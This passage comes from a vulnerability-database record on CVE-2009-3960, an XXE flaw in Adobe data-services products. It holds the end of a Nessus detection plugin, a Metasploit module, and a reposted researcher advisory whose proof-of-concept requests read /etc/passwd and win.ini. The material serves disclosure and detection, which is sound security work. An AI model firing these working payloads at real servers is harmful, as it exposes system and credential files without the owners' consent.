\"/lcds/messagebroker/httpsecure\", # LCDS\n \"/lcds-samples/messagebroker/http\", # LCDS\n \"/lcds-samples/messagebroker/httpsecure\"); # LCDS\n }\n else\n {\n urls = make_list(\n \"/flex2gateway/http\", # ColdFusion 9 (disabled by default)\n \"/messagebroker/http\",\n \"/blazeds/messagebroker/http\", # Blazeds 3.2\n \"/samples/messagebroker/http\", # Blazeds 3.2\n \"/lcds/messagebroker/http\", # LCDS\n \"/lcds-samples/messagebroker/http\"); # LCDS\n }\n}\nelse\n{\n if (get_port_transport(port) > ENCAPS_IP)\n {\n # nb : Both endpoints (http/httpsecure) are vulnerable on\n # encrypted ports.\n\n urls = make_list(\n \"/flex2gateway/http\", # ColdFusion 9 (disabled by default)\n \"/flex2gateway/httpsecure\", # ColdFusion 9 (disabled by default)\n \"/messagebroker/http\",\n \"/messagebroker/httpsecure\", # Blazeds 3.2\n \"/blazeds/messagebroker/http\", # Blazeds 3.2\n \"/blazeds/messagebroker/httpsecure\",\n \"/lcds/messagebroker/http\", # LCDS\n \"/lcds/messagebroker/httpsecure\"); # LCDS\n }\n else\n {\n urls = make_list(\n \"/flex2gateway/http\", # ColdFusion 9 (disabled by default)\n \"/messagebroker/http\",\n \"/blazeds/messagebroker/http\", # Blazeds 3.2\n \"/lcds/messagebroker/http\"); # LCDS\n }\n}\n\nos = get_kb_item(\"Host/OS\");\nif (os)\n{\n if (\"Windows\" >< os) injections = make_list(\n '<!DOCTYPE foo [ <!ENTITY nessus SYSTEM \"c:\\\\windows\\\\win.ini\"> ]>',\n '<!DOCTYPE foo [ <!ENTITY nessus SYSTEM \"c:\\\\winnt\\\\win.ini\"> ]>');\n else injections = make_list(\n '<!DOCTYPE foo [ <!ENTITY nessus SYSTEM \"/etc/passwd\"> ]>');\n}\nelse injections = make_list(\n '<!DOCTYPE foo [ <!ENTITY nessus SYSTEM \"c:\\\\windows\\\\win.ini\"> ]>',\n '<!DOCTYPE foo [ <!ENTITY nessus SYSTEM \"c:\\\\winnt\\\\win.ini\"> ]>',\n '<!DOCTYPE foo [ <!ENTITY nessus SYSTEM \"/etc/passwd\"> ]>');\n\ninjection_pats = make_array();\ninjection_pats['<!DOCTYPE foo [ <!ENTITY nessus SYSTEM \"c:\\\\windows\\\\win.ini\"> ]>'] = \"\\[[a-zA-Z\\s]+\\]|; for 16-bit app support\";\ninjection_pats['<!DOCTYPE foo [ <!ENTITY nessus SYSTEM \"c:\\\\winnt\\\\win.ini\"> ]>'] = \"\\[[a-zA-Z\\s]+\\]|; for 16-bit app support\";\ninjection_pats['<!DOCTYPE foo [ <!ENTITY nessus SYSTEM \"/etc/passwd\"> ]>'] = \"root:.*:0:[01]:\";\n\ninfo = NULL;\n\nforeach injection (injections)\n{\n foreach url (urls)\n {\n exploit = '<?xml version=\"1.0\" encoding=\"utf-8\"?>' + '\\n' +\n injection + '\\n' +\n '<amfx ver=\"3\" xmlns=\"http://www.macromedia.com/2005/amfx\">' + '\\n' +\n ' <body>' + '\\n' +\n ' <object type=\"flex.messaging.messages.CommandMessage\">' + '\\n' +\n ' <traits>' + '\\n' +\n ' <string>body</string><string>clientId</string><string>correlationId</string>' + '\\n' +\n ' <string>destination</string><string>headers</string><string>messageId</string>' + '\\n' +\n ' <string>operation</string><string>timestamp</string><string>timeToLive</string>' + '\\n' +\n ' </traits><object><traits />' + '\\n' +\n ' </object>' + '\\n' +\n ' <null /><string /><string />' + '\\n' +\n ' <object>' + '\\n' +\n ' <traits>' + '\\n' +\n ' <string>DSId</string><string>DSMessagingVersion</string>' + '\\n' +\n ' </traits>' + '\\n' +\n ' <string>nil</string><int>1</int>' + '\\n' +\n ' </object>' + '\\n' +\n ' <string>&nessus;</string>' + '\\n' +\n '<int>5</int><int>0</int><int>0</int>' + '\\n' +\n ' </object>' + '\\n' +\n ' </body>' + '\\n' +\n '</amfx>';\n\n res = http_send_recv3(\n method:\"POST\",\n item:url,\n port:port,\n add_headers: make_array(\"Content-Type\", \"application/x-amf\"),\n data:exploit,\n exit_on_fail:TRUE);\n\n match = egrep(pattern:injection_pats[injection], string:res[2]);\n\n if (\n res[2] &&\n \"<amfx\" >< res[2] &&\n (!empty_or_null(match))\n )\n {\n req = http_last_sent_request();\n output = NULL;\n\n if (\"win.ini\" >< injection)\n {\n file = \"win.ini\";\n }\n else file = \"/etc/passwd\";\n\n # Format output\n pos = stridx(match, \"null/><string>\");\n if (pos > 0 && !empty_or_null(pos))\n {\n output = substr(match, pos);\n output = output - \"null/><string>\";\n }\n # Should never reach this, but just in case\n if (empty_or_null(output))\n output = extract_pattern_from_resp(string:res[2], pattern:'RE:'+injection_pats[injection]);\n\n output = data_protection::redact_etc_passwd(output:output);\n info += '\\n' + 'HTTPChannel Endpoint : ' + url + '\\n';\n snip = crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30);\n info += '\\n' +\n 'Nessus was able to exploit the issue to retrieve the contents of ' +\n '\\n' + \"'\" + file + \"'\" + ' using the following request :' +\n '\\n\\n' +req +'\\n\\n' +\n 'This produced the following truncated output (limited to 10 lines) :' +\n '\\n' + snip +\n '\\n' + beginning_of_response2(resp:output, max_lines:10) +\n '\\n' + snip +\n '\\n';\n }\n if (!isnull(info)) break;\n }\n if (!isnull(info)) break;\n}\n\nif (!isnull(info))\n{\n if (report_verbosity > 0)\n {\n report = '\\n' +\n \"Nessus found following vulnerable HTTPChannel endpoint : \" + '\\n' +\n info + '\\n';\n security_warning(port:port, extra:report);\n }\n else\n security_warning(port);\n}\nelse exit(0, 'Nessus did not identify any affected endpoints on the webserver listening on port '+ port);\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "metasploit": [{"lastseen": "2019-02-12T12:52:53", "bulletinFamily": "exploit", "description": "Multiple Adobe Products -- XML External Entity Injection. Affected Software: BlazeDS 3.2 and earlier versions, LiveCycle 9.0, 8.2.1, and 8.0.1, LiveCycle Data Services 3.0, 2.6.1, and 2.5.1, Flex Data Services 2.0.1, ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2", "modified": "2017-08-27T01:01:10", "published": "2010-11-04T02:11:31", "id": "MSF:AUXILIARY/SCANNER/HTTP/ADOBE_XML_INJECT", "href": "", "type": "metasploit", "title": "Adobe XML External Entity Injection", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'Adobe XML External Entity Injection',\n 'Description' => %q{\n Multiple Adobe Products -- XML External Entity Injection. Affected Software: BlazeDS 3.2 and\n earlier versions, LiveCycle 9.0, 8.2.1, and 8.0.1, LiveCycle Data Services 3.0, 2.6.1, and\n 2.5.1, Flex Data Services 2.0.1, ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2\n },\n 'References' =>\n [\n [ 'CVE', '2009-3960' ],\n [ 'OSVDB', '62292' ],\n [ 'BID', '38197' ],\n [ 'URL', 'http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf' ],\n [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb10-05.html'],\n ],\n 'Author' => [ 'CG' ],\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n Opt::RPORT(8400),\n OptString.new('FILE', [ true, \"File to read\", '/etc/passwd']),\n ])\n end\n\n def run_host(ip)\n path = [\n \"/flex2gateway/\",\n \"/flex2gateway/http\", # ColdFusion 9 (disabled by default), works on some CF 8 though :-)\n \"/flex2gateway/httpsecure\", # ColdFusion 9 (disabled by default) SSL\n \"/flex2gateway/cfamfpolling\",\n \"/flex2gateway/amf\",\n \"/flex2gateway/amfpolling\",\n \"/messagebroker/http\",\n \"/messagebroker/httpsecure\", #SSL\n \"/blazeds/messagebroker/http\", # Blazeds 3.2\n \"/blazeds/messagebroker/httpsecure\", #SSL\n \"/samples/messagebroker/http\", # Blazeds 3.2\n \"/samples/messagebroker/httpsecure\", # Blazeds 3.2 SSL\n \"/lcds/messagebroker/http\", # LCDS\n \"/lcds/messagebroker/httpsecure\", # LCDS -- SSL\n \"/lcds-samples/messagebroker/http\", # LCDS\n \"/lcds-samples/messagebroker/httpsecure\", # LCDS -- SSL\n ]\n\n postrequest = \"<\\?xml version=\\\"1.0\\\" encoding=\\\"utf-8\\\"\\?>\"\n postrequest << \"<\\!DOCTYPE test [ <\\!ENTITY x3 SYSTEM \\\"#{datastore['FILE']}\\\"> ]>\"\n postrequest << \"<amfx ver=\\\"3\\\" xmlns=\\\"http://www.macromedia.com/2005/amfx\\\">\"\n postrequest << \"<body><object type=\\\"flex.messaging.messages.CommandMessage\\\"><traits>\"\n postrequest << \"<string>body</string><string>clientId</string><string>correlationId</string><string>destination</string>\"\n postrequest << \"<string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string>\"\n postrequest << \"<string>timeToLive</string></traits><object><traits /></object><null /><string /><string /><object>\"\n postrequest << \"<traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string>\"\n postrequest << \"<int>1</int></object><string>&x3;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>\"\n\n path.each do | check |\n\n res = send_request_cgi({\n 'uri' => check,\n 'method' => 'POST',\n 'version' => '1.1',\n 'Content-Type' => 'application/x-amf',\n 'data' => postrequest\n }, 25)\n\n if (res.nil?)\n print_error(\"no response for #{ip}:#{rport} #{check}\")\n elsif (res.code == 200 and res.body =~ /\\<\\?xml version\\=\"1.0\" encoding=\"utf-8\"\\?\\>/)\n print_status(\"#{rhost}:#{rport} #{check} #{res.code}\\n #{res.body}\")\n elsif (res and res.code == 302 or res.code == 301)\n print_status(\" Received 302 to #{res.headers['Location']} for #{check}\")\n else\n print_error(\"#{res.code} for #{check}\")\n #''\n end\n end\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, Rex::ConnectionError =>e\n print_error(e.message)\n rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =>e\n print_error(e.message)\n end\nend\n\n#set FILE /proc/sys/kernel/osrelease\n#set FILE /proc/sys/kernel/hostname\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/adobe_xml_inject.rb"}], "seebug": [{"lastseen": "2017-11-19T18:14:46", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2010-02-22T00:00:00", "published": "2010-02-22T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19164", "id": "SSV:19164", "title": "Multiple Adobe Products XML External Entity And XML Injection Vulnerabilities", "type": "seebug", "sourceData": "\n Multiple Adobe Products\r\nXML External Entity And XML Injection Vulnerabilities\r\n \r\nCVE: CVE-2009-3960\r\nAdobe PSIRT: APSB10-05 - http://www.adobe.com/support/security/bulletins/apsb10-05.html\r\nLink: http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf\r\n \r\n+-----------+\r\n|Description|\r\n+-----------+\r\n \r\nSecurity-Assessment.com discovered that multiple Adobe\r\nproducts with different Data Services versions are\r\nvulnerable to XML External Entity (XXE) and XML\r\ninjection attacks.\r\nXML external Entities injection allows a wide range of\r\nXML based attacks, including local file disclosure,\r\nTCP scans and Denial of Service condition, which can\r\nbe achieved by recursive entity injection, attribute\r\nblow up and other types of injection.\r\nFor more information about the implications associated\r\nto this vulnerability, refer to the RFC2518 (17.7\r\nImplications of XML External Entities):\r\nhttp://www.ietf.org/rfc/rfc2518.txt\r\n \r\n+--------------+\r\n|Product Review|\r\n+--------------+\r\n \r\nAdobe Data Services components provide Flex/RIA\r\napplications with data messaging, remoting and\r\nmanagement capabilities.\r\n \r\nThe discovered vulnerabilities affect the HTTPChannel\r\n servlet classes which are respectively\r\n\u201cmx.messaging.channels.HTTPChannel\u201d and\r\n\u201cmx.messaging.channels.SecureHTTPChannel\u201d. These\r\nclasses are part of the Data Services Messaging\r\nclasses and can be found in the\r\nflex-messaging-common.jar Java archive.\r\n \r\nThe HTTPChannel transports data in the AMFX format,\r\nwhich is the text-based XML representation of AMF.\r\nThe HTTPChannel endpoints are defined in the\r\nservices-config.xml file, located within the\r\nFlex/WEB-INF folder of the application.\r\nBy default, the HTTPChannel classes are mapped to\r\nthe following endpoints:\r\n \r\n1. http://{server.name}:{server.port}/{context.root}/messagebroker/http\r\n2. https://{server.name}:{server.port}/{context.root}/messagebroker/httpsecure\r\n \r\nNote that the HTTPChannel may be mapped to different\r\nendpoints.\r\nThis depends on the deployed application and the\r\nframework in use (e.g. BlazeDS, Adobe LiveCycle\r\nData Services, etc.).\r\n \r\n+--------------------------------------------+\r\n|Exploitation - XML External Entity Injection|\r\n+--------------------------------------------+\r\n \r\nXML entities can be declared and included within AMFX\r\nrequests passed to the HTTPChannel. The XML parser\r\nparses the payload and successfully processes\r\ninjected entities.\r\n \r\nThe following table shows an example of XML external\r\nentity injection which leads to local file disclosure.\r\nThe AMFX request is sent via the HTTPChannel endpoint\r\nin BlazeDS.\r\n \r\nXML External Entity Injection \u2013 Local File Disclosure\r\nPoC \u2013 BlazeDS \u2013 Request\r\n \r\nPOST /samples/messagebroker/http HTTP/1.1\r\nContent-type: application/x-amf\r\n \r\n<?xml version="1.0" encoding="utf-8"?>\r\n<!DOCTYPE test [ <!ENTITY x3 SYSTEM "/etc/passwd"> ]>\r\n<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx">\r\n <body>\r\n <object type="flex.messaging.messages.CommandMessage">\r\n <traits>\r\n <string>body</string><string>clientId</string><string>correlationId</string>\r\n <string>destination</string><string>headers</string><string>messageId</string>\r\n <string>operation</string><string>timestamp</string><string>timeToLive</string>\r\n </traits><object><traits />\r\n </object>\r\n <null /><string /><string />\r\n <object>\r\n <traits>\r\n <string>DSId</string><string>DSMessagingVersion</string>\r\n </traits>\r\n <string>nil</string><int>1</int>\r\n </object>\r\n <string>&x3;</string>\r\n<int>5</int><int>0</int><int>0</int>\r\n </object>\r\n </body>\r\n</amfx>\r\n \r\n \r\nXML External Entity Injection \u2013 Local File Inclusion\r\nPoC \u2013 BlazeDS \u2013 Response\r\n \r\n<?xml version="1.0" encoding="utf-8"?>\r\n<amfx ver="3"><header name="AppendToGatewayUrl" mustUnderstand="true">\r\n<string>;jsessionid=2191D3647221B72039C5B05D38084A42</string></header>\r\n<body targetURI="/onResult" responseURI="">\r\n<object type="flex.messaging.messages.AcknowledgeMessage">\r\n<traits><string>timestamp</string><string>headers</string>\r\n<string>body</string><string>correlationId</string>\r\n<string>messageId</string><string>timeToLive</string>\r\n<string>clientId</string><string>destination</string>\r\n</traits><double>1.257387140632E12</double><object>\r\n<traits><string>DSMessagingVersion</string>\r\n<string>DSId</string></traits><double>1.0</double>\r\n<string>BDE929FE-270D-3B56-1061-616E8B938429</string>\r\n</object><null/><string>root:x:0:0:root:/root:/bin/bash\r\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\r\nbin:x:2:2:bin:/bin:/bin/sh\r\nsys:x:3:3:sys:/dev:/bin/sh\r\nsync:x:4:65534:sync:/bin:/bin/sync\r\ngames:x:5:60:games:/usr/games:/bin/sh\r\nman:x:6:12:man:/var/cache/man:/bin/sh\r\nlp:x:7:7:lp:/var/spool/lpd:/bin/sh\r\n[...]\r\n \r\n \r\nThe above injection was successfully tested on\r\nmultiple Adobe products, as shown below:\r\n \r\n1. Product: Adobe BlazeDS 3.2.0.39\r\nLinux Ubuntu 9.04 / Tomcat 6.0.14\r\n \r\nEndpoint URIs:\r\n \r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\r\n \r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n \r\n \r\n2. Adobe LiveCycle Data Services ES2 3.0\r\nWindows XP SP2 / Tomcat 6.0.14\r\n \r\nEndpoint URIs:\r\n \r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\r\n \r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n \r\n3. ColdFusion 9.0\r\nWindows XP SP2 / Tomcat 6.0.14\r\n \r\nEndpoint URIs:\r\n \r\n{server.name}:{server.port}/\r\n{context.root}/flex2gateway/http\r\n{server.name}:{server.port}/\r\n{context.root}/flex2gateway/httpsecure \r\n \r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n \r\n4. Adobe LiveCycle ES2\r\nWindows XP SP2 / IBM Websphere 7.0\r\n \r\nEndpoint URIs:\r\n \r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\r\n \r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n \r\nThe vendor has released several patches for this\r\nvulnerability. See the Solution section of this\r\ndocument for more information.\r\n \r\n+----------------------------+\r\n|Exploitation - XML Injection|\r\n+----------------------------+\r\n \r\nThe XML parser lacks of proper input and output\r\nvalidation controls. Security-Assessment.com managed\r\nto inject arbitrary XML content which was returned\r\nin the XML response.\r\nThe following table shows an XML injection in the\r\nBlazeDS HTTPChannel. The injected payload becomes\r\npart of the response. In this case, injection is\r\npossible via the \u201cresponseURI\u201d attribute.\r\n \r\nXMLInjection \u2013 BlazeDS - Request\r\n \r\nPOST /samples/messagebroker/http HTTP/1.1\r\nContent-type: application/x-amf\r\n \r\n<?xml version="1.0" encoding="utf-8"?>\r\n<amfx ver="3"><body targetURI="" responseURI="d&quot; injectedattr=&quot;anything"><null/>\r\n</body></amfx>\r\n \r\nXMLInjection \u2013 BlazeDS - Response\r\n \r\n<?xml version="1.0" encoding="utf-8"?>\r\n<amfx ver="3"><body targetURI="d" injectedattr="anything" responseURI=""><null/></body></amfx></body></amfx>\r\n \r\nThe above injection was successfully tested on\r\nmultiple Adobe products, as shown below:\r\n \r\n1. Product: Adobe BlazeDS 3.2.0.39\r\nLinux Ubuntu 9.04 / Tomcat 6.0.14\r\n \r\nEndpoint URIs:\r\n \r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\r\n \r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n \r\n \r\n2. Adobe LiveCycle Data Services ES2 3.0\r\nWindows XP SP2 / Tomcat 6.0.14\r\n \r\nEndpoint URIs:\r\n \r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\r\n \r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n \r\n3. ColdFusion 9.0\r\nWindows XP SP2 / Tomcat 6.0.14\r\n \r\nEndpoint URIs:\r\n \r\n{server.name}:{server.port}/\r\n{context.root}/flex2gateway/http\r\n{server.name}:{server.port}/\r\n{context.root}/flex2gateway/httpsecure \r\n \r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n \r\n4. Adobe LiveCycle ES2\r\nWindows XP SP2 / IBM Websphere 7.0\r\n \r\nEndpoint URIs:\r\n \r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\r\n \r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n \r\n \r\nThe vendor has released several patches for this\r\nvulnerability. See the Solution section of this\r\ndocument for more information.\r\n \r\n \r\n+--------+\r\n|Solution|\r\n+--------+\r\n \r\nSecurity-Assessment.com follows responsible\r\ndisclosure and promptly contacted the vendor after\r\ndiscovering the issues. The vendor was contacted on\r\nthe 6th November 2009 and a reply was received on the\r\nsame day. The vendor released security patches on\r\nthe 11th February 2010.\r\n \r\nThe security patches can be downloaded at the\r\nfollowing website:\r\n \r\nhttp://www.adobe.com/support/security/bulletins/apsb10-05.html\r\n \r\n \r\n+------+\r\n|Credit|\r\n+------+\r\n \r\nDiscovered and advised to Adobe in\r\nNovember 2009 by Roberto Suggi Liverani of Security-\r\nAssessment.com. Personal Page: http://malerisch.net/\r\n \r\nFor full details regarding this vulnerability\r\ndownload the PDF from our website:\r\n \r\nhttp://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf\r\n \r\n \r\n+---------+\r\n|Greetings|\r\n+---------+\r\n \r\nBug found at Hack in The Sun 2009, Waiheke Island.\r\n \r\n \r\n+-----------------------------+\r\n|About Security-Assessment.com|\r\n+-----------------------------+\r\n \r\nSecurity-Assessment.com is a New Zealand based world\r\nleader in web application testing, network security\r\nand penetration testing. Security-Assessment.com\r\nservices organisations across New Zealand, Australia,\r\nAsia Pacific, the United States and the United\r\nKingdom.\r\n \r\nRoberto Suggi Liverani\n ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-19164"}], "packetstorm": [{"lastseen": "2016-12-05T22:21:05", "bulletinFamily": "exploit", "description": "", "modified": "2010-02-23T00:00:00", "published": "2010-02-23T00:00:00", "href": "https://packetstormsecurity.com/files/86558/Adobe-Products-XML-External-Entity-And-XML-Injection.html", "id": "PACKETSTORM:86558", "type": "packetstorm", "title": "Adobe Products XML External Entity And XML Injection", "sourceData": "` \n( , ) (, \n. `.' ) ('. ', \n). , ('. ( ) ( \n(_,) .`), ) _ _, \n/ _____/ / _ \\ ____ ____ _____ \n\\____ \\==/ /_\\ \\ _/ ___\\/ _ \\ / \\ \n/ \\/ | \\\\ \\__( <_> ) Y Y \\ \n/______ /\\___|__ / \\___ >____/|__|_| / \n\\/ \\/.-. \\/ \\/:wq \n(x.0) \n'=.|w|.=' \n_='`\"``=. \n \npresents.. \n \nMultiple Adobe Products \nXML External Entity And XML Injection Vulnerabilities \n \nCVE: CVE-2009-3960 \nAdobe PSIRT: APSB10-05 - http://www.adobe.com/support/security/bulletins/apsb10-05.html \nLink: http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf \n \n+-----------+ \n|Description| \n+-----------+ \n \nSecurity-Assessment.com discovered that multiple Adobe \nproducts with different Data Services versions are \nvulnerable to XML External Entity (XXE) and XML \ninjection attacks. \nXML external Entities injection allows a wide range of \nXML based attacks, including local file disclosure, \nTCP scans and Denial of Service condition, which can \nbe achieved by recursive entity injection, attribute \nblow up and other types of injection. \nFor more information about the implications associated \nto this vulnerability, refer to the RFC2518 (17.7 \nImplications of XML External Entities): \nhttp://www.ietf.org/rfc/rfc2518.txt \n \n+--------------+ \n|Product Review| \n+--------------+ \n \nAdobe Data Services components provide Flex/RIA \napplications with data messaging, remoting and \nmanagement capabilities. \n \nThe discovered vulnerabilities affect the HTTPChannel \nservlet classes which are respectively \n\u201cmx.messaging.channels.HTTPChannel\u201d and \n\u201cmx.messaging.channels.SecureHTTPChannel\u201d. These \nclasses are part of the Data Services Messaging \nclasses and can be found in the \nflex-messaging-common.jar Java archive. \n \nThe HTTPChannel transports data in the AMFX format, \nwhich is the text-based XML representation of AMF. \nThe HTTPChannel endpoints are defined in the \nservices-config.xml file, located within the \nFlex/WEB-INF folder of the application. \nBy default, the HTTPChannel classes are mapped to \nthe following endpoints: \n \n1. http://{server.name}:{server.port}/{context.root}/messagebroker/http \n2. https://{server.name}:{server.port}/{context.root}/messagebroker/httpsecure \n \nNote that the HTTPChannel may be mapped to different \nendpoints. \nThis depends on the deployed application and the \nframework in use (e.g. BlazeDS, Adobe LiveCycle \nData Services, etc.). \n \n+--------------------------------------------+ \n|Exploitation - XML External Entity Injection| \n+--------------------------------------------+ \n \nXML entities can be declared and included within AMFX \nrequests passed to the HTTPChannel. The XML parser \nparses the payload and successfully processes \ninjected entities. \n \nThe following table shows an example of XML external \nentity injection which leads to local file disclosure. \nThe AMFX request is sent via the HTTPChannel endpoint \nin BlazeDS. \n \nXML External Entity Injection \u2013 Local File Disclosure \nPoC \u2013 BlazeDS \u2013 Request \n \nPOST /samples/messagebroker/http HTTP/1.1 \nContent-type: application/x-amf \n \n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<!DOCTYPE test [ <!ENTITY x3 SYSTEM \"/etc/passwd\"> ]> \n<amfx ver=\"3\" xmlns=\"http://www.macromedia.com/2005/amfx\"> \n<body> \n<object type=\"flex.messaging.messages.CommandMessage\"> \n<traits> \n<string>body</string><string>clientId</string><string>correlationId</string> \n<string>destination</string><string>headers</string><string>messageId</string> \n<string>operation</string><string>timestamp</string><string>timeToLive</string> \n</traits><object><traits /> \n</object> \n<null /><string /><string /> \n<object> \n<traits> \n<string>DSId</string><string>DSMessagingVersion</string> \n</traits> \n<string>nil</string><int>1</int> \n</object> \n<string>&x3;</string> \n<int>5</int><int>0</int><int>0</int> \n</object> \n</body> \n</amfx> \n \n \nXML External Entity Injection \u2013 Local File Inclusion \nPoC \u2013 BlazeDS \u2013 Response \n \n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<amfx ver=\"3\"><header name=\"AppendToGatewayUrl\" mustUnderstand=\"true\"> \n<string>;jsessionid=2191D3647221B72039C5B05D38084A42</string></header> \n<body targetURI=\"/onResult\" responseURI=\"\"> \n<object type=\"flex.messaging.messages.AcknowledgeMessage\"> \n<traits><string>timestamp</string><string>headers</string> \n<string>body</string><string>correlationId</string> \n<string>messageId</string><string>timeToLive</string> \n<string>clientId</string><string>destination</string> \n</traits><double>1.257387140632E12</double><object> \n<traits><string>DSMessagingVersion</string> \n<string>DSId</string></traits><double>1.0</double> \n<string>BDE929FE-270D-3B56-1061-616E8B938429</string> \n</object><null/><string>root:x:0:0:root:/root:/bin/bash \ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh \nbin:x:2:2:bin:/bin:/bin/sh \nsys:x:3:3:sys:/dev:/bin/sh \nsync:x:4:65534:sync:/bin:/bin/sync \ngames:x:5:60:games:/usr/games:/bin/sh \nman:x:6:12:man:/var/cache/man:/bin/sh \nlp:x:7:7:lp:/var/spool/lpd:/bin/sh \n[...] \n \n \nThe above injection was successfully tested on \nmultiple Adobe products, as shown below: \n \n1. Product: Adobe BlazeDS 3.2.0.39 \nLinux Ubuntu 9.04 / Tomcat 6.0.14 \n \nEndpoint URIs: \n \n{server.name}:{server.port}/ \n{context.root}/messagebroker/http \n{server.name}:{server.port}/ \n{context.root}/messagebroker/httpsecure \n \nMethods: POST, GET \nProtocols: HTTP, HTTPS \n \n \n2. Adobe LiveCycle Data Services ES2 3.0 \nWindows XP SP2 / Tomcat 6.0.14 \n \nEndpoint URIs: \n \n{server.name}:{server.port}/ \n{context.root}/messagebroker/http \n{server.name}:{server.port}/ \n{context.root}/messagebroker/httpsecure \n \nMethods: POST, GET \nProtocols: HTTP, HTTPS \n \n3. ColdFusion 9.0 \nWindows XP SP2 / Tomcat 6.0.14 \n \nEndpoint URIs: \n \n{server.name}:{server.port}/ \n{context.root}/flex2gateway/http \n{server.name}:{server.port}/ \n{context.root}/flex2gateway/httpsecure \n \nMethods: POST, GET \nProtocols: HTTP, HTTPS \n \n4. Adobe LiveCycle ES2 \nWindows XP SP2 / IBM Websphere 7.0 \n \nEndpoint URIs: \n \n{server.name}:{server.port}/ \n{context.root}/messagebroker/http \n{server.name}:{server.port}/ \n{context.root}/messagebroker/httpsecure \n \nMethods: POST, GET \nProtocols: HTTP, HTTPS \n \nThe vendor has released several patches for this \nvulnerability. See the Solution section of this \ndocument for more information. \n \n+----------------------------+ \n|Exploitation - XML Injection| \n+----------------------------+ \n \nThe XML parser lacks of proper input and output \nvalidation controls. Security-Assessment.com managed \nto inject arbitrary XML content which was returned \nin the XML response. \nThe following table shows an XML injection in the \nBlazeDS HTTPChannel. The injected payload becomes \npart of the response. In this case, injection is \npossible via the \u201cresponseURI\u201d attribute. \n \nXMLInjection \u2013 BlazeDS - Request \n \nPOST /samples/messagebroker/http HTTP/1.1 \nContent-type: application/x-amf \n \n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<amfx ver=\"3\"><body targetURI=\"\" responseURI=\"d\" injectedattr=\"anything\"><null/> \n</body></amfx> \n \nXMLInjection \u2013 BlazeDS - Response \n \n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<amfx ver=\"3\"><body targetURI=\"d\" injectedattr=\"anything\" responseURI=\"\"><null/></body></amfx></body></amfx> \n \nThe above injection was successfully tested on \nmultiple Adobe products, as shown below: \n \n1. Product: Adobe BlazeDS 3.2.0.39 \nLinux Ubuntu 9.04 / Tomcat 6.0.14 \n \nEndpoint URIs: \n \n{server.name}:{server.port}/ \n{context.root}/messagebroker/http \n{server.name}:{server.port}/ \n{context.root}/messagebroker/httpsecure \n \nMethods: POST, GET \nProtocols: HTTP, HTTPS \n \n \n2. Adobe LiveCycle Data Services ES2 3.0 \nWindows XP SP2 / Tomcat 6.0.14 \n \nEndpoint URIs: \n \n{server.name}:{server.port}/ \n{context.root}/messagebroker/http \n{server.name}:{server.port}/ \n{context.root}/messagebroker/httpsecure \n \nMethods: POST, GET \nProtocols: HTTP, HTTPS \n \n3. ColdFusion 9.0 \nWindows XP SP2 / Tomcat 6.0.14 \n \nEndpoint URIs: \n \n{server.name}:{server.port}/ \n{context.root}/flex2gateway/http 